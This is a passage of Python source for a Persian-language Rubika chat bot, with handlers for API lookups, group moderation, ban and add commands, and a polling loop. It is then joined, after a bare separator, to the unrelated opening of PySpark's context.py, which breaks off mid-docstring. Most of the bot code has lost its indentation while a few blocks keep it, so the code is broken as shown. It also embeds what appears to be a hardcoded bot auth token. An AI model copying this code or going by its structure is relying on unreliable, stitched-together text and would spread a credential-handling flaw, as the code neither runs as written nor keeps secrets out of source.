print('code bz danesh api bug')
return False
def anti_insult(text,chat,bot):
try:
admins = [i["member_guid"] for i in bot.getGroupAdmins(chat['object_guid'])["data"]["in_chat_members"]]
if not chat['last_message']['author_object_guid'] in admins:
print('yek ahmagh fohsh dad: ' + chat['last_message']['author_object_guid'])
bot.deleteMessages(chat['object_guid'], [chat['last_message']['message_id']])
return True
return False
except:
print('delete the fohsh err')
def anti_tabligh(text,chat,bot):
try:
admins = [i["member_guid"] for i in bot.getGroupAdmins(chat['object_guid'])["data"]["in_chat_members"]]
if not chat['last_message']['author_object_guid'] in admins:
print('yek ahmagh tabligh kard: ' + chat['last_message']['author_object_guid'])
bot.deleteMessages(chat['object_guid'], [chat['last_message']['message_id']])
return True
return False
except:
print('tabligh delete err')
def get_curruncy(text,chat,bot):
try:
t = json.loads(requests.get('https://api.codebazan.ir/arz/?type=arz').text)
text = ''
for i in t:
price = i['price'].replace(',','')[:-1] + ' تومان'
text += i['name'] + ' : ' + price + '\n'
bot.sendMessage(chat['object_guid'], text, chat['last_message']['message_id'])
except:
print('code bz arz err')
return True
def shot_image(text,chat,bot):
try:
c_id = chat['last_message']['message_id']
msg_data = bot.getMessagesInfo(chat['object_guid'], [c_id])
msg_data = msg_data[0]
if 'reply_to_message_id' in msg_data.keys():
msg_data = bot.getMessagesInfo(chat['object_guid'], [msg_data['reply_to_message_id']])[0]
if 'text' in msg_data.keys() and msg_data['text'].strip() != '':
txt_xt = msg_data['text']
res = requests.get('https://api.otherapi.tk/carbon?type=create&code=' + txt_xt + '&theme=vscode')
if res.status_code == 200 and res.content != b'':
b2 = res.content
tx = bot.requestFile('code_image.png', len(b2), 'png')
access = bot.fileUpload(b2, tx['access_hash_send'], tx['id'], tx['upload_url'])
width, height = bot.getImageSize(b2)
bot.sendImage(chat['object_guid'] ,tx['id'] , 'png', tx['dc_id'] , access, 'code_image.png', len(b2) , str(bot.getThumbInline(b2))[2:-1] , width, height ,message_id= c_id)
print('sended file')
except:
print('code bz shot err')
return True
def get_ip(text,chat,bot):
try:
ip = text[5:-1]
if hasInsult(ip)[0] == False:
jd = json.loads(requests.get('https://api.codebazan.ir/ipinfo/?ip=' + ip).text)
text = 'نام شرکت:\n' + jd['company'] + '\n\nکشور : \n' + jd['country_name'] + '\n\nارائه دهنده : ' + jd['isp']
bot.sendMessage(chat['object_guid'], text , chat['last_message']['message_id'])
except:
print('code bz ip err')
return True
def get_weather(text,chat,bot):
try:
city = text[10:-1]
if hasInsult(city)[0] == False:
jd = json.loads(requests.get('https://api.codebazan.ir/weather/?city=' + city).text)
text = 'دما : \n'+jd['result']['دما'] + '\n سرعت باد:\n' + jd['result']['سرعت باد'] + '\n وضعیت هوا: \n' + jd['result']['وضعیت هوا'] + '\n\n بروز رسانی اطلاعات امروز: ' + jd['result']['به روز رسانی'] + '\n\nپیش بینی هوا فردا: \n دما: ' + jd['فردا']['دما'] + '\n وضعیت هوا : ' + jd['فردا']['وضعیت هوا']
bot.sendMessage(chat['object_guid'], text , chat['last_message']['message_id'])
except:
print('code bz weather err')
return True
def get_whois(text,chat,bot):
try:
site = text[8:-1]
jd = json.loads(requests.get('https://api.codebazan.ir/whois/index.php?type=json&domain=' + site).text)
text = 'مالک : \n'+jd['owner'] + '\n\n آیپی:\n' + jd['ip'] + '\n\nآدرس مالک : \n' + jd['address'] + '\n\ndns1 : \n' + jd['dns']['1'] + '\ndns2 : \n' + jd['dns']['2']
bot.sendMessage(chat['object_guid'], text , chat['last_message']['message_id'])
except:
print('code bz whois err')
return True
def get_font(text,chat,bot):
try:
name_user = text[7:-1]
jd = json.loads(requests.get('https://api.codebazan.ir/font/?text=' + name_user).text)
jd = jd['result']
text = ''
for i in range(1,100):
text += jd[str(i)] + '\n'
if hasInsult(name_user)[0] == False and chat['abs_object']['type'] == 'Group':
bot.sendMessage(chat['object_guid'], 'نتایج کامل به پیوی شما ارسال شد', chat['last_message']['message_id'])
bot.sendMessage(chat['last_message']['author_object_guid'], 'نتایج یافت شده برای (' + name_user + ') : \n\n'+text)
elif chat['abs_object']['type'] == 'User':
bot.sendMessage(chat['object_guid'], text , chat['last_message']['message_id'])
except:
print('code bz font err')
return True
def get_ping(text,chat,bot):
try:
site = text[7:-1]
jd = requests.get('https://api.codebazan.ir/ping/?url=' + site).text
text = str(jd)
bot.sendMessage(chat['object_guid'], text , chat['last_message']['message_id'])
except:
print('code bz ping err')
return True
def get_gold(text,chat,bot):
try:
r = json.loads(requests.get('https://www.wirexteam.ga/gold').text)
change = str(r['data']['last_update'])
r = r['gold']
text = ''
for o in r:
text += o['name'] + ' : ' + o['nerkh_feli'] + '\n'
text += '\n\nآخرین تغییر : ' + change
bot.sendMessage(chat['object_guid'], text , chat['last_message']['message_id'])
except:
print('gold server err')
return True
def get_wiki(text,chat,bot):
try:
t = text[7:-1]
t = t.split(':')
mozoa = ''
t2 = ''
page = int(t[0])
for i in range(1,len(t)):
t2 += t[i]
mozoa = t2
if hasInsult(mozoa)[0] == False and chat['abs_object']['type'] == 'Group' and page > 0:
text_t = requests.get('https://api.codebazan.ir/wiki/?search=' + mozoa).text
if not 'codebazan.ir' in text_t:
CLEANR = re.compile('<.*?>')
def cleanhtml(raw_html):
cleantext = re.sub(CLEANR, '', raw_html)
return cleantext
text_t = cleanhtml(text_t)
n = 4200
text_t = text_t.strip()
max_t = page * n
min_t = max_t - n
text = text_t[min_t:max_t]
bot.sendMessage(chat['object_guid'], 'مقاله "'+ mozoa + '" صفحه : ' + str(page) + ' به پیوی شما ارسال شد', chat['last_message']['message_id'])
bot.sendMessage(chat['last_message']['author_object_guid'], 'نتایج یافت شده برای (' + mozoa + ') : \n\n'+text)
elif chat['abs_object']['type'] == 'User' and page > 0:
text_t = requests.get('https://api.codebazan.ir/wiki/?search=' + mozoa).text
if not 'codebazan.ir' in text_t:
CLEANR = re.compile('<.*?>')
def cleanhtml(raw_html):
cleantext = re.sub(CLEANR, '', raw_html)
return cleantext
text_t = cleanhtml(text_t)
n = 4200
text_t = text_t.strip()
max_t = page * n
min_t = max_t - n
text = text_t[min_t:max_t]
bot.sendMessage(chat['object_guid'], text, chat['last_message']['message_id'])
except:
print('code bz wiki err')
return True
def get_pa_na_pa(text,chat,bot):
try:
jd = requests.get('https://api.codebazan.ir/jok/pa-na-pa/').text
bot.sendMessage(chat['object_guid'], jd, chat['last_message']['message_id'])
except:
print('code bz pa na pa err')
return True
def get_dastan(text,chat,bot):
try:
jd = requests.get('https://api.codebazan.ir/dastan/').text
bot.sendMessage(chat['object_guid'], jd, chat['last_message']['message_id'])
except:
print('code bz dastan err')
return True
def get_search_k(text,chat,bot):
try:
search = text[11:-1]
if hasInsult(search)[0] == False and chat['abs_object']['type'] == 'Group':
jd = json.loads(requests.get('https://zarebin.ir/api/?q=' + search + '&page=1&limit=10').text)
results = jd['results']['webs']
text = ''
for result in results:
text += result['title'] + ':\n\n ' + str(result['description']).replace('</em>', '').replace('<em>', '').replace('(Meta Search Engine)', '').replace('"', '').replace(' — ', '').replace(' AP', '') + '\n\n'
bot.sendMessage(chat['object_guid'], 'نتایج کامل به پیوی شما ارسال شد', chat['last_message']['message_id'])
bot.sendMessage(chat['last_message']['author_object_guid'], 'نتایج یافت شده برای (' + search + ') : \n\n'+text)
elif chat['abs_object']['type'] == 'User':
jd = json.loads(requests.get('https://zarebin.ir/api/?q=' + search + '&page=1&limit=10').text)
results = jd['results']['webs']
text = ''
for result in results:
text += result['title'] + ':\n\n ' + str(result['description']).replace('</em>', '').replace('<em>', '').replace('(Meta Search Engine)', '').replace('"', '').replace(' — ', '').replace(' AP', '') + '\n\n'
bot.sendMessage(chat['object_guid'], text , chat['last_message']['message_id'])
except:
print('zarebin search err')
return True
def get_bio(text,chat,bot):
try:
jd = requests.get('https://api.codebazan.ir/bio/').text
bot.sendMessage(chat['object_guid'], jd, chat['last_message']['message_id'])
except:
print('code bz bio err')
return True
def get_trans(text,chat,bot):
try:
t = text[8:-1]
t = t.split(':')
lang = t[0]
t2 = ''
for i in range(1,len(t)):
t2 += t[i]
text_trans = t2
if hasInsult(text_trans)[0] == False:
t = Translator()
text = t.translate(text_trans,lang).text
bot.sendMessage(chat['object_guid'], text, chat['last_message']['message_id'])
elif chat['abs_object']['type'] == 'User':
t = Translator()
text = t.translate(text_trans,lang).text
bot.sendMessage(chat['object_guid'], text, chat['last_message']['message_id'])
except:
print('google trans err')
return True
def get_khatere(text,chat,bot):
try:
jd = requests.get('https://api.codebazan.ir/jok/khatere/').text
bot.sendMessage(chat['object_guid'], jd, chat['last_message']['message_id'])
except:
print('code bz khatere err')
return True
def get_danesh(text,chat,bot):
try:
jd = requests.get('https://api.codebazan.ir/danestani/').text
bot.sendMessage(chat['object_guid'], jd, chat['last_message']['message_id'])
except:
print('code bz danesh err')
return True
def get_alaki_masala(text,chat,bot):
try:
jd = requests.get('https://api.codebazan.ir/jok/alaki-masalan/').text
bot.sendMessage(chat['object_guid'], jd, chat['last_message']['message_id'])
except:
print('code bz alaki masala err')
return True
def name_shakh(text,chat,bot):
try:
jd = requests.get('https://api.codebazan.ir/name/').text
bot.sendMessage(chat['object_guid'], jd, chat['last_message']['message_id'])
except:
print('code bz name err')
def get_vaj(text,chat,bot):
try:
vaj = text[6:-1]
if hasInsult(vaj)[0] == False:
jd = json.loads(requests.get('https://api.codebazan.ir/vajehyab/?text=' + vaj).text)
jd = jd['result']
text = 'معنی : \n'+jd['mani'] + '\n\n لغتنامه معین:\n' + jd['Fmoein'] + '\n\nلغتنامه دهخدا : \n' + jd['Fdehkhoda'] + '\n\nمترادف و متضاد : ' + jd['motaradefmotezad']
bot.sendMessage(chat['object_guid'], text , chat['last_message']['message_id'])
except:
print('code bz vaj err')
def get_font_fa(text,chat,bot):
try:
site = text[10:-1]
jd = json.loads(requests.get('https://api.codebazan.ir/font/?type=fa&text=' + site).text)
jd = jd['Result']
text = ''
for i in range(1,10):
text += jd[str(i)] + '\n'
if hasInsult(site)[0] == False and chat['abs_object']['type'] == 'Group':
bot.sendMessage(chat['object_guid'], 'نتایج کامل به پیوی شما ارسال شد', chat['last_message']['message_id'])
bot.sendMessage(chat['last_message']['author_object_guid'], 'نتایج یافت شده برای (' + site + ') : \n\n'+text)
elif chat['abs_object']['type'] == 'User':
bot.sendMessage(chat['object_guid'], text , chat['last_message']['message_id'])
except:
print('code bz font fa err')
def get_leaved(text,chat,bot):
try:
send_text = 'بای بای 🖖'
bot.sendMessage(chat['object_guid'], send_text, chat['last_message']['message_id'])
except:
print('rub server err')
def get_added(text,chat,bot):
try:
group = chat['abs_object']['title']
send_text = 'سلام دوست عزیز به ' + group + ' خوش آمدی ❤ \n لطفا قوانین رو رعایت کن ✅'
bot.sendMessage(chat['object_guid'], send_text, chat['last_message']['message_id'])
except:
print('rub server err')
def get_help(text,chat,bot):
text = open('help.txt','r').read()
if chat['abs_object']['type'] == 'Group':
bot.sendMessage(chat['object_guid'], 'نتایج کامل به پیوی شما ارسال شد', chat['last_message']['message_id'])
bot.sendMessage(chat['last_message']['author_object_guid'], text)
elif chat['abs_object']['type'] == 'User':
bot.sendMessage(chat['object_guid'], text, chat['last_message']['message_id'])
print('help guid sended')
def usvl_save_data(text,chat,bot):
try:
c_id = chat['last_message']['message_id']
msg_data = bot.getMessagesInfo(chat['object_guid'], [c_id])
msg_data = msg_data[0]
if 'reply_to_message_id' in msg_data.keys():
msg_data = bot.getMessagesInfo(chat['object_guid'], [msg_data['reply_to_message_id']])[0]
if 'text' in msg_data.keys() and msg_data['text'].strip() != '':
txt_xt = msg_data['text']
f3 = len(open('farsi-dic.txt','rb').read())
if f3 < 83886080:
f2 = open('farsi-dic.txt','r').read().split('|/|\n')[:-1]
f2 = [i.split('|=|')[0] for i in f2]
if not txt_xt in f2:
f2 = open('farsi-dic.txt','a')
f2.write(txt_xt + '|=|' + text + '|/|\n')
f2.close()
else:
bot.sendMessage(chat['object_guid'], '!usvl_stop')
b2 = open('farsi-dic.txt','rb').read()
tx = bot.requestFile('farsi-dic.txt', len(b2), 'txt')
access = bot.fileUpload(b2, tx['access_hash_send'], tx['id'], tx['upload_url'])
bot.sendFile(chat['object_guid'] ,tx['id'] , 'txt', tx['dc_id'] , access, 'farsi-dic.txt', len(b2), message_id=c_id)
return True
except:
print('server rubika err')
def usvl_test_data(text,chat,bot):
try:
f2 = open('farsi-dic.txt','r').read().split('|/|\n')[:-1]
texts = [i.split('|=|')[0] for i in f2]
replies = [i.split('|=|')[1] for i in f2]
shebahat = 0.0
a = 0
shabih_tarin = None
for text2 in texts:
sh2 = similar(text, text2)
if sh2 > shebahat:
shebahat = sh2
shabih_tarin = a
a += 1
print('shabih tarin: ' + str(shabih_tarin) , '|| darsad shebaht :' + str(shebahat))
if shabih_tarin != None:
bot.sendMessage(chat['object_guid'], replies[shabih_tarin], chat['last_message']['message_id'])
except:
print('server rubika err')
def get_backup(text,chat,bot):
try:
b2 = open('farsi-dic.txt','rb').read()
tx = bot.requestFile('farsi-dic.txt', len(b2), 'txt')
access = bot.fileUpload(b2, tx['access_hash_send'], tx['id'], tx['upload_url'])
bot.sendFile(chat['object_guid'] ,tx['id'] , 'txt', tx['dc_id'] , access, 'farsi-dic.txt', len(b2), message_id=chat['last_message']['message_id'])
except:
print('back err')
g_usvl = ''
test_usvl = False
auth = "wxhowsospgttjkzekifbuuodgylafvrj"
bot = Bot(auth)
list_message_seened = []
time_reset = math.floor(datetime.datetime.today().timestamp()) + 350
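# Main polling loop: fetch recent chat updates, skip messages already recorded in list_message_seened,
# and dispatch each recognised "!command" to its handler, usually on a separate Thread so slow HTTP
# calls don't block the loop. time_reset is presumably used later in the loop to periodically clear
# the seen-message cache.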
while(2 > 1):
try:
chats_list:list = bot.get_updates_all_chats()
qrozAdmins = open('qrozAdmins.txt','r').read().split('\n')
if chats_list != []:
for chat in chats_list:
access = chat['access']
if chat['abs_object']['type'] == 'User' or chat['abs_object']['type'] == 'Group':
text:str = chat['last_message']['text']
print(chat)
if 'SendMessages' in access and chat['last_message']['type'] == 'Text' and text.strip() != '':
text = text.strip()
m_id = chat['object_guid'] + chat['last_message']['message_id']
if not m_id in list_message_seened:
print('new message')
if text == '!start':
print('message geted and sinned')
try:
bot.sendMessage(chat['object_guid'], 'سلام \n به ابر سرویس کروز خوش آمدید ❤\n\n لطفا جهت راهنما \n!help \nرا ارسال کنید',chat['last_message']['message_id'])
print('sended response')
except:
print('server bug1')
elif text.startswith('!nim http://') == True or text.startswith('!nim https://') == True:
try:
bot.sendMessage(chat['object_guid'], "در حال آماده سازی لینک ...",chat['last_message']['message_id'])
print('sended response')
link = text[4:]
nim_baha_link=requests.post("https://www.digitalbam.ir/DirectLinkDownloader/Download",params={'downloadUri':link})
pg:str = nim_baha_link.text
pg = pg.split('{"fileUrl":"')
pg = pg[1]
pg = pg.split('","message":""}')
pg = pg[0]
nim_baha = pg
try:
bot.sendMessage(chat['object_guid'], 'لینک نیم بها شما با موفقیت آماده شد ✅ \n لینک : \n' + nim_baha ,chat['last_message']['message_id'])
print('sended response')
except:
print('server bug2')
except:
print('server bug3')
elif text.startswith('!info @'):
tawd10 = Thread(target=info_qroz, args=(text, chat, bot,))
tawd10.start()
elif text.startswith('!search ['):
tawd11 = Thread(target=search, args=(text, chat, bot,))
tawd11.start()
elif text.startswith('!wiki-s ['):
try:
search = text[9:-1]
search = search + ' ویکی پدیا'
if hasInsult(search)[0] == False and chat['abs_object']['type'] == 'Group':
jd = json.loads(requests.get('https://zarebin.ir/api/?q=' + search + '&page=1&limit=10').text)
results = jd['results']['webs'][0:4]
text = ''
for result in results:
if ' - ویکیپدیا، دانشنامهٔ آزاد' in result['title']:
title = result['title'].replace(' - ویکیپدیا، دانشنامهٔ آزاد','')
text += title + ' :\n\n' + str(result['description']).replace('</em>', '').replace('<em>', '').replace('(Meta Search Engine)', '').replace('"', '').replace(' — ', '').replace(' AP', '') + '\n\nمقاله کامل صفحه 1 : \n' + '!wiki [1:' + title + ']\n\n'
bot.sendMessage(chat['object_guid'], 'نتایج به پیوی شما ارسال شد', chat['last_message']['message_id'])
bot.sendMessage(chat['last_message']['author_object_guid'], 'نتایج یافت شده برای (' + search + ') : \n\n'+text)
elif chat['abs_object']['type'] == 'User':
jd = json.loads(requests.get('https://zarebin.ir/api/?q=' + search + '&page=1&limit=10').text)
results = jd['results']['webs'][0:4]
text = ''
for result in results:
if ' - ویکیپدیا، دانشنامهٔ آزاد' in result['title']:
title = result['title'].replace(' - ویکیپدیا، دانشنامهٔ آزاد','')
text += title + ' :\n\n' + str(result['description']).replace('</em>', '').replace('<em>', '').replace('(Meta Search Engine)', '').replace('"', '').replace(' — ', '').replace(' AP', '') + '\n\nمقاله کامل صفحه 1 : \n' + '!wiki [1:' + title + ']\n\n'
bot.sendMessage(chat['object_guid'], text , chat['last_message']['message_id'])
except:
print('wiki s err')
elif text.startswith('!jok'):
tawd9 = Thread(target=joker, args=(text, chat, bot,))
tawd9.start()
elif text.startswith('!name_shakh'):
tawd32 = Thread(target=name_shakh, args=(text, chat, bot,))
tawd32.start()
elif text.startswith('!khatere'):
tawd29 = Thread(target=get_khatere, args=(text, chat, bot,))
tawd29.start()
elif text.startswith('!danesh'):
tawd30 = Thread(target=get_danesh, args=(text, chat, bot,))
tawd30.start()
elif text.startswith('!pa_na_pa'):
tawd24 = Thread(target=get_pa_na_pa, args=(text, chat, bot,))
tawd24.start()
elif text.startswith('!alaki_masala'):
tawd31 = Thread(target=get_alaki_masala, args=(text, chat, bot,))
tawd31.start()
elif text.startswith('!dastan'):
tawd25 = Thread(target=get_dastan, args=(text, chat, bot,))
tawd25.start()
elif text.startswith('!bio'):
tawd27 = Thread(target=get_bio, args=(text, chat, bot,))
tawd27.start()
elif text.startswith('!search-k ['):
tawd26 = Thread(target=get_search_k, args=(text, chat, bot,))
tawd26.start()
elif text.startswith('!ban [') and chat['abs_object']['type'] == 'Group' and 'BanMember' in access:
try:
user = text[6:-1].replace('@', '')
guid = bot.getInfoByUsername(user)["data"]["chat"]["abs_object"]["object_guid"]
admins = [i["member_guid"] for i in bot.getGroupAdmins(chat['object_guid'])["data"]["in_chat_members"]]
if not guid in admins and chat['last_message']['author_object_guid'] in admins:
bot.banGroupMember(chat['object_guid'], guid)
bot.sendMessage(chat['object_guid'], 'انجام شد' , chat['last_message']['message_id'])
except:
print('ban bug')
elif text.startswith('!search-i ['):
print('mpa started')
tawd = Thread(target=search_i, args=(text, chat, bot,))
tawd.start()
elif text.startswith('!remove') and chat['abs_object']['type'] == 'Group' and 'BanMember' in access:
print('mpa started')
tawd2 = Thread(target=uesr_remove, args=(text, chat, bot,))
tawd2.start()
elif text.startswith('!trans ['):
tawd28 = Thread(target=get_trans, args=(text, chat, bot,))
tawd28.start()
elif text.startswith('!myket-s ['):
try:
search = text[10:-1]
if hasInsult(search)[0] == False and chat['abs_object']['type'] == 'Group':
bot.sendMessage(chat['object_guid'], 'نتایج کامل به زودی به پیوی شما ارسال میشوند', chat['last_message']['message_id'])
jd = json.loads(requests.get('https://www.wirexteam.ga/myket?type=search&query=' + search).text)
jd = jd['search']
a = 0
text = ''
for j in jd:
if a <= 7:
text += '🔸 عنوان : ' + j['title_fa'] + '\nℹ️ توضیحات : '+ j['tagline'] + '\n🆔 نام یکتا برنامه : ' + j['package_name'] + '\n⭐️امتیاز: ' + str(j['rate']) + '\n✳ نام نسخه : ' + j['version'] + '\nقیمت : ' + j['price'] + '\nحجم : ' + j['size'] + '\nبرنامه نویس : ' + j['developer'] + '\n\n'
a += 1
else:
break
if text != '':
bot.sendMessage(chat['last_message']['author_object_guid'], 'نتایج یافت شده برای (' + search + ') : \n\n'+text)
elif chat['abs_object']['type'] == 'User':
jd = json.loads(requests.get('https://www.wirexteam.ga/myket?type=search&query=' + search).text)
jd = jd['search']
a = 0
text = ''
for j in jd:
if a <= 7:
text += '🔸 عنوان : ' + j['title_fa'] + '\nℹ️ توضیحات : '+ j['tagline'] + '\n🆔 نام یکتا برنامه : ' + j['package_name'] + '\n⭐️امتیاز: ' + str(j['rate']) + '\n✳ نام نسخه : ' + j['version'] + '\nقیمت : ' + j['price'] + '\nحجم : ' + j['size'] + '\nبرنامه نویس : ' + j['developer'] + '\n\n'
a += 1
else:
break
if text != '':
bot.sendMessage(chat['object_guid'], text , chat['last_message']['message_id'])
except:
print('myket server err')
elif text.startswith('!wiki ['):
tawd23 = Thread(target=get_wiki, args=(text, chat, bot,))
tawd23.start()
elif text.startswith('!currency'):
print('mpa started')
tawd15 = Thread(target=get_curruncy, args=(text, chat, bot,))
tawd15.start()
elif text.startswith('!gold'):
tawd22 = Thread(target=get_gold, args=(text, chat, bot,))
tawd22.start()
elif text.startswith('!ping ['):
tawd21 = Thread(target=get_ping, args=(text, chat, bot,))
tawd21.start()
elif text.startswith('!font ['):
tawd20 = Thread(target=get_font, args=(text, chat, bot,))
tawd20.start()
elif text.startswith('!font-fa ['):
tawd34 = Thread(target=get_font_fa, args=(text, chat, bot,))
tawd34.start()
elif text.startswith('!whois ['):
tawd19 = Thread(target=get_whois, args=(text, chat, bot,))
tawd19.start()
elif text.startswith('!vaj ['):
tawd33 = Thread(target=get_vaj, args=(text, chat, bot,))
tawd33.start()
elif text.startswith('!weather ['):
tawd18 = Thread(target=get_weather, args=(text, chat, bot,))
tawd18.start()
elif text.startswith('!ip ['):
tawd17 = Thread(target=get_ip, args=(text, chat, bot,))
tawd17.start()
elif text.startswith("!add [") and chat['abs_object']['type'] == 'Group' and 'AddMember' in access:
try:
user = text[6:-1]
bot.invite(chat['object_guid'], [bot.getInfoByUsername(user.replace('@', ''))["data"]["chat"]["object_guid"]])
bot.sendMessage(chat['object_guid'], 'اضافه شد' , chat['last_message']['message_id'])
except:
print('add not successful')
elif text.startswith('!math ['):
try:
amal_and_value = text[7:-1]
natije = ''
# check exponentiation first so that '**' is not misread as '*' (or as a '-' sign in the exponent)
if amal_and_value.count('**') == 1:
    value1 = float(amal_and_value.split('**')[0].strip())
    value2 = float(amal_and_value.split('**')[1].strip())
    natije = value1 ** value2
elif amal_and_value.count('*') == 1:
    value1 = float(amal_and_value.split('*')[0].strip())
    value2 = float(amal_and_value.split('*')[1].strip())
    natije = value1 * value2
elif amal_and_value.count('/') > 0:
    value1 = float(amal_and_value.split('/')[0].strip())
    value2 = float(amal_and_value.split('/')[1].strip())
    natije = value1 / value2
elif amal_and_value.count('+') > 0:
    value1 = float(amal_and_value.split('+')[0].strip())
    value2 = float(amal_and_value.split('+')[1].strip())
    natije = value1 + value2
elif amal_and_value.count('-') > 0:
    value1 = float(amal_and_value.split('-')[0].strip())
    value2 = float(amal_and_value.split('-')[1].strip())
    natije = value1 - value2
if natije != '':
    bot.sendMessage(chat['object_guid'], str(natije), chat['last_message']['message_id'])
except:
print('math err')
elif text.startswith('!shot'):
tawd16 = Thread(target=shot_image, args=(text, chat, bot,))
tawd16.start()
elif text.startswith('!speak'):
print('mpa started')
tawd6 = Thread(target=speak_after, args=(text, chat, bot,))
tawd6.start()
elif text.startswith('!p_danesh'):
tawd12 = Thread(target=p_danesh, args=(text, chat, bot,))
tawd12.start()
elif text.startswith('!write ['):
print('mpa started')
tawd5 = Thread(target=write_image, args=(text, chat, bot,))
tawd5.start()
elif chat['abs_object']['type'] == 'Group' and 'DeleteGlobalAllMessages' in access and hasInsult(text)[0] == True:
tawd13 = Thread(target=anti_insult, args=(text, chat, bot,))
tawd13.start()
elif chat['abs_object']['type'] == 'Group' and 'DeleteGlobalAllMessages' in access and hasAds(text) == True:
tawd14 = Thread(target=anti_tabligh, args=(text, chat, bot,))
tawd14.start()
elif text.startswith('!help'):
tawd38 = Thread(target=get_help, args=(text, chat, bot,))
tawd38.start()
elif text.startswith('!usvl_start') and chat['abs_object']['type'] == 'Group' and chat['last_message']['author_object_guid'] in qrozAdmins and g_usvl == '':
g_usvl = chat['object_guid']
bot.sendMessage(chat['object_guid'], 'usvl is started', chat['last_message']['message_id'])
elif text.startswith('!usvl_stop') and chat['abs_object']['type'] == 'Group' and chat['last_message']['author_object_guid'] in qrozAdmins and g_usvl != '':
g_usvl = ''
bot.sendMessage(chat['object_guid'], 'usvl is stopped', chat['last_message']['message_id'])
elif text.startswith('!usvl_test') and chat['abs_object']['type'] == 'Group' and chat['last_message']['author_object_guid'] in qrozAdmins and g_usvl == '' and test_usvl == False:
test_usvl = True
bot.sendMessage(chat['object_guid'], 'test usvl is started', chat['last_message']['message_id'])
elif text.startswith('!usvl_untest') and chat['abs_object']['type'] == 'Group' and chat['last_message']['author_object_guid'] in qrozAdmins and test_usvl == True:
test_usvl = False
bot.sendMessage(chat['object_guid'], 'test usvl is stopped', chat['last_message']['message_id'])
elif text.startswith('!backup') and chat['object_guid'] in qrozAdmins:
tawd44 = Thread(target=get_backup, args=(text, chat, bot,))
tawd44.start()
elif chat['object_guid'] == g_usvl and chat['last_message']['author_object_guid'] != 'u0DHSrv0bd39028f37e44305e207e38a' and chat['abs_object']['type'] == 'Group':
tawd42 = Thread(target=usvl_save_data, args=(text, chat, bot,))
tawd42.start()
elif test_usvl == True and chat['last_message']['author_object_guid'] != 'u0DHSrv0bd39028f37e44305e207e38a' and chat['abs_object']['type'] == 'Group':
print('usvl tested')
tawd43 = Thread(target=usvl_test_data, args=(text, chat, bot,))
tawd43.start()
list_message_seened.append(m_id)
elif 'SendMessages' in access and chat['last_message']['type'] == 'Other' and text.strip() != '' and chat['abs_object']['type'] == 'Group':
text = text.strip()
m_id = chat['object_guid'] + chat['last_message']['message_id']
if not m_id in list_message_seened:
if text == 'یک عضو گروه را ترک کرد.':
tawd35 = Thread(target=get_leaved, args=(text, chat, bot,))
tawd35.start()
elif text == '1 عضو جدید به گروه افزوده شد.' or text == 'یک عضو از طریق لینک به گروه افزوده شد.':
tawd36 = Thread(target=get_added, args=(text, chat, bot,))
tawd36.start()
list_message_seened.append(m_id)
elif 'SendMessages' in access and text.strip() != '' and chat['abs_object']['type'] == 'Group':
text = text.strip()
m_id = chat['object_guid'] + chat['last_message']['message_id']
if not m_id in list_message_seened:
if 'DeleteGlobalAllMessages' in access and hasInsult(text)[0] == True:
tawd39 = Thread(target=anti_insult, args=(text, chat, bot,))
tawd39.start()
list_message_seened.append(m_id)
elif 'DeleteGlobalAllMessages' in access and hasAds(text) == True:
tawd40 = Thread(target=anti_tabligh, args=(text, chat, bot,))
tawd40.start()
list_message_seened.append(m_id)
else:
print('no update ')
except:
print('qroz err koli')
time_reset2 = int(datetime.datetime.today().timestamp())
if list_message_seened != [] and time_reset2 > time_reset:
    list_message_seened = []
    time_reset = int(datetime.datetime.today().timestamp()) + 350
|
context.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import shutil
import signal
import sys
import threading
import warnings
import importlib
from threading import RLock
from tempfile import NamedTemporaryFile
from py4j.protocol import Py4JError
from py4j.java_gateway import is_instance_of
from pyspark import accumulators, since
from pyspark.accumulators import Accumulator
from pyspark.broadcast import Broadcast, BroadcastPickleRegistry
from pyspark.conf import SparkConf
from pyspark.files import SparkFiles
from pyspark.java_gateway import launch_gateway, local_connect_and_auth
from pyspark.serializers import PickleSerializer, BatchedSerializer, UTF8Deserializer, \
PairDeserializer, AutoBatchedSerializer, NoOpSerializer, ChunkedStream
from pyspark.storagelevel import StorageLevel
from pyspark.resource.information import ResourceInformation
from pyspark.rdd import RDD, _load_from_socket
from pyspark.taskcontext import TaskContext
from pyspark.traceback_utils import CallSite, first_spark_call
from pyspark.status import StatusTracker
from pyspark.profiler import ProfilerCollector, BasicProfiler
__all__ = ['SparkContext']
# These are special default configs for PySpark; they override Spark's
# defaults unless the user has explicitly configured these keys.
DEFAULT_CONFIGS = {
"spark.serializer.objectStreamReset": 100,
"spark.rdd.compress": True,
}
class SparkContext(object):
"""
Main entry point for Spark functionality. A SparkContext represents the
connection to a Spark cluster, and can be used to create :class:`RDD` and
broadcast variables on that cluster.
When you create a new SparkContext, at least the master and app name should
be set, either through the named parameters here or through `conf`.
Parameters
----------
master : str, optional
Cluster URL to connect to (e.g. mesos://host:port, spark://host:port, local[4]).
appName : str, optional
A name for your job, to display on the cluster web UI.
sparkHome : str, optional
Location where Spark is installed on cluster nodes.
pyFiles : list, optional
Collection of .zip or .py files to send to the cluster
and add to PYTHONPATH. These can be paths on the local file
system or HDFS, HTTP, HTTPS, or FTP URLs.
environment : dict, optional
A dictionary of environment variables to set on
worker nodes.
batchSize : int, optional
The number of Python objects represented as a single
Java object. Set 1 to disable batching, 0 to automatically choose
the batch size based on object sizes, or -1 to use an unlimited
batch size
serializer : :class:`pyspark.serializers.Serializer`, optional
The serializer for RDDs.
conf : :py:class:`pyspark.SparkConf`, optional
An object setting Spark properties.
gateway : :py:class:`py4j.java_gateway.JavaGateway`, optional
Use an existing gateway and JVM, otherwise a new JVM
will be instantiated. This is only used internally.
jsc : :py:class:`py4j.java_gateway.JavaObject`, optional
The JavaSparkContext instance. This is only used internally.
profiler_cls : type, optional
A class of custom Profiler used to do profiling
(default is :class:`pyspark.profiler.BasicProfiler`).
Notes
-----
Only one :class:`SparkContext` should be active per JVM. You must `stop()`
the active :class:`SparkContext` before creating a new one.
A :class:`SparkContext` instance cannot be shared across multiple
